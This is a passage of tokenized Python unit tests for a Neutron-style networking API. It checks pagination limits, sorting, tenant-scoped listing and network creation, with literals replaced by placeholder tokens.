test_limit_with_great_than_max_limit ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_zero ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT:0>' } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_unspecific ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_negative_value ( self ) : <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : - <NUM_LIT:1> } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_limit_with_non_integer ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:abc>' } , expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_limit_with_infinite_pagination_max_limit ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = None ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_negative_pagination_max_limit ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = None ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit_with_non_integer_pagination_max_limit ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> cfg . CONF . set_default ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( limit = None ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_marker ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> marker = _uuid ( ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : marker } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:1000> , marker = marker ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_page_reverse ( self ) : <EOL> calls = [ ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = True ) <EOL> calls . append ( mock . call . get_networks ( mock . ANY , ** kwargs ) ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> instance . get_networks . reset_mock ( ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = False ) <EOL> calls . append ( mock . call . get_networks ( mock . ANY , ** kwargs ) ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_page_reverse_with_non_bool ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:abc>' } ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = False ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_page_reverse_with_unspecific ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) ) <EOL> kwargs = self . _get_collection_kwargs ( page_reverse = False ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_sort ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( sorts = [ ( '<STR_LIT:name>' , False ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT:id>' , True ) ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_sort_with_primary_key ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( sorts = [ ( '<STR_LIT:name>' , False ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT:id>' , False ) ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_sort_without_direction ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:name>' ] } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_sort_with_invalid_attribute ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:abc>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_sort_with_invalid_dirs ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT:name>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' } , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_emulated_sort ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = False <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = False <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( <EOL> skipargs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_emulated_sort_without_sort_field ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = False <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = False <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( <EOL> skipargs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> fields = _ArgMatcher ( _list_cmp , [ '<STR_LIT:name>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_emulated_pagination ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = False <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : False } ) <EOL> kwargs = self . _get_collection_kwargs ( skipargs = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_native_pagination_without_native_sorting ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = False <EOL> self . assertRaises ( n_exc . Invalid , router . APIRouter ) <EOL> def test_native_pagination_without_allow_sorting ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( sorts = [ ( '<STR_LIT:name>' , False ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT:id>' , True ) ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> class JSONV2TestCase ( APIv2TestBase , testlib_api . WebTestCase ) : <EOL> def _test_list ( self , req_tenant_id , real_tenant_id ) : <EOL> env = { } <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> input_dict = { '<STR_LIT:id>' : uuidutils . generate_uuid ( ) , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : real_tenant_id , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' , <EOL> fmt = self . fmt ) , extra_environ = env ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> if not req_tenant_id or req_tenant_id == real_tenant_id : <EOL> self . assertEqual ( <NUM_LIT:1> , len ( res [ '<STR_LIT>' ] ) ) <EOL> output_dict = res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> input_dict [ '<STR_LIT>' ] = False <EOL> self . assertEqual ( len ( input_dict ) , len ( output_dict ) ) <EOL> for k , v in six . iteritems ( input_dict ) : <EOL> self . assertEqual ( v , output_dict [ k ] ) <EOL> else : <EOL> self . assertEqual ( <NUM_LIT:0> , len ( res [ '<STR_LIT>' ] ) ) <EOL> def test_list_noauth ( self ) : <EOL> self . _test_list ( None , _uuid ( ) ) <EOL> def test_list_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_list ( tenant_id , tenant_id ) <EOL> def test_list_keystone_bad ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_list ( tenant_id + "<STR_LIT>" , tenant_id ) <EOL> def test_list_pagination ( self ) : <EOL> id1 = str ( _uuid ( ) ) <EOL> id2 = str ( _uuid ( ) ) <EOL> input_dict1 = { '<STR_LIT:id>' : id1 , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> input_dict2 = { '<STR_LIT:id>' : id2 , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict1 , input_dict2 ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : [ str ( _uuid ( ) ) ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( <NUM_LIT:2> , len ( res [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( sorted ( [ id1 , id2 ] ) , <EOL> sorted ( [ res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , <EOL> res [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:id>' ] ] ) ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> next_links = [ ] <EOL> previous_links = [ ] <EOL> for r in res [ '<STR_LIT>' ] : <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> next_links . append ( r ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> previous_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( next_links ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( previous_links ) ) <EOL> url = urlparse . urlparse ( next_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> params [ '<STR_LIT>' ] = [ id2 ] <EOL> self . assertEqual ( params , urlparse . parse_qs ( url . query ) ) <EOL> url = urlparse . urlparse ( previous_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> params [ '<STR_LIT>' ] = [ id1 ] <EOL> params [ '<STR_LIT>' ] = [ '<STR_LIT:True>' ] <EOL> self . assertEqual ( params , urlparse . parse_qs ( url . query ) ) <EOL> def test_list_pagination_with_last_page ( self ) : <EOL> id = str ( _uuid ( ) ) <EOL> input_dict = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : str ( _uuid ( ) ) } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( <NUM_LIT:1> , len ( res [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( id , res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> previous_links = [ ] <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> previous_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( previous_links ) ) <EOL> url = urlparse . urlparse ( previous_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expect_params = params . copy ( ) <EOL> expect_params [ '<STR_LIT>' ] = [ id ] <EOL> expect_params [ '<STR_LIT>' ] = [ '<STR_LIT:True>' ] <EOL> self . assertEqual ( expect_params , urlparse . parse_qs ( url . query ) ) <EOL> def test_list_pagination_with_empty_page ( self ) : <EOL> return_value = [ ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : str ( _uuid ( ) ) } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( [ ] , res [ '<STR_LIT>' ] ) <EOL> previous_links = [ ] <EOL> if '<STR_LIT>' in res : <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> previous_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( previous_links ) ) <EOL> url = urlparse . urlparse ( previous_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expect_params = params . copy ( ) <EOL> del expect_params [ '<STR_LIT>' ] <EOL> expect_params [ '<STR_LIT>' ] = [ '<STR_LIT:True>' ] <EOL> self . assertEqual ( expect_params , urlparse . parse_qs ( url . query ) ) <EOL> def test_list_pagination_reverse_with_last_page ( self ) : <EOL> id = str ( _uuid ( ) ) <EOL> input_dict = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : [ str ( _uuid ( ) ) ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:True>' ] } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( id , res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> next_links = [ ] <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> next_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( next_links ) ) <EOL> url = urlparse . urlparse ( next_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expected_params = params . copy ( ) <EOL> del expected_params [ '<STR_LIT>' ] <EOL> expected_params [ '<STR_LIT>' ] = [ id ] <EOL> self . assertEqual ( expected_params , <EOL> urlparse . parse_qs ( url . query ) ) <EOL> def test_list_pagination_reverse_with_empty_page ( self ) : <EOL> return_value = [ ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : [ str ( _uuid ( ) ) ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:True>' ] } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( [ ] , res [ '<STR_LIT>' ] ) <EOL> next_links = [ ] <EOL> if '<STR_LIT>' in res : <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> next_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( next_links ) ) <EOL> url = urlparse . urlparse ( next_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expect_params = params . copy ( ) <EOL> del expect_params [ '<STR_LIT>' ] <EOL> del expect_params [ '<STR_LIT>' ] <EOL> self . assertEqual ( expect_params , urlparse . parse_qs ( url . query ) ) <EOL> def test_create ( self ) : <EOL> net_id = _uuid ( ) <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> return_value = { '<STR_LIT>' : [ ] , '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT:id>' : net_id } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> net = res [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> def test_create_use_defaults ( self ) : <EOL> net_id = _uuid ( ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } } <EOL> full_input [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> return_value = { '<STR_LIT:id>' : net_id , '<STR_LIT:status>' : "<STR_LIT>" } <EOL> return_value . update ( full_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( initial_input ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> instance . create_network . assert_called_with ( mock . ANY , <EOL> network = full_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> net = res [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertTrue ( net [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> def test_create_no_keystone_env ( self ) : <EOL> data = { '<STR_LIT:name>' : '<STR_LIT>' } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_with_keystone_env ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> net_id = _uuid ( ) <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , tenant_id ) } <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : tenant_id } } <EOL> full_input [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> return_value = { '<STR_LIT:id>' : net_id , '<STR_LIT:status>' : "<STR_LIT>" } <EOL> return_value . update ( full_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( initial_input ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> extra_environ = env ) <EOL> instance . create_network . assert_called_with ( mock . ANY , <EOL> network = full_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> def test_create_bad_keystone_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : tenant_id } } <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , tenant_id + "<STR_LIT>" ) } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data , <EOL> extra_environ = env ) <EOL> def test_create_no_body ( self ) : <EOL> data = { '<STR_LIT>' : None } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_body_string_not_json ( self ) : <EOL> data = '<STR_LIT>' <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_body_boolean_not_json ( self ) : <EOL> data = True <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_no_resource ( self ) : <EOL> data = { } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_missing_attr ( self ) : <EOL> data = { '<STR_LIT:port>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_readonly_attr ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) , <EOL> '<STR_LIT:status>' : "<STR_LIT>" } } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_with_too_long_name ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : "<STR_LIT>" * <NUM_LIT:32> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_create_bulk ( self ) : <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } ] } <EOL> def side_effect ( context , network ) : <EOL> net = network . copy ( ) <EOL> net [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : [ ] } ) <EOL> return net [ '<STR_LIT>' ] <EOL> instance = self . plugin . return_value <EOL> instance . create_network . side_effect = side_effect <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> def _test_create_failure_bad_request ( self , resource , data , ** kwargs ) : <EOL> res = self . api . post ( _get_path ( resource , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True , ** kwargs ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_create_bulk_networks_none ( self ) : <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_create_bulk_networks_empty_list ( self ) : <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , { '<STR_LIT>' : [ ] } ) <EOL> def 